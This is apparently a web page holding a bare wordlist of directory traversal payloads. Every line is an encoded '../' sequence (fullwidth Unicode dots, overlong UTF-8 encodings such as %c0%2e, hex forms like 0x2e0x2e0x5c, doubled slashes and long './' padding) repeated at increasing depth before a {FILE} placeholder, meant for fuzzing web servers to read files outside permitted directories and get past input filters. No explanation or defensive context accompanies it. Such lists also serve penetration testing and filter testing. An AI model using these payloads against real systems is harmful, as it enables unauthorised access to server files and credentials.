%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
///%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
\\\%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
..//{FILE}&lt;br /&gt;
..//..//{FILE}&lt;br /&gt;
..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//..//..//..//{FILE}&lt;br /&gt;
..///{FILE}&lt;br /&gt;
..///..///{FILE}&lt;br /&gt;
..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///..///..///..///{FILE}&lt;br /&gt;
..\\{FILE}&lt;br /&gt;
..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\\{FILE}&lt;br /&gt;
..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
./\/./{FILE}&lt;br /&gt;
./\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
./../{FILE}&lt;br /&gt;
./.././../{FILE}&lt;br /&gt;
./.././.././../{FILE}&lt;br /&gt;
./.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././.././../{FILE}&lt;br /&gt;
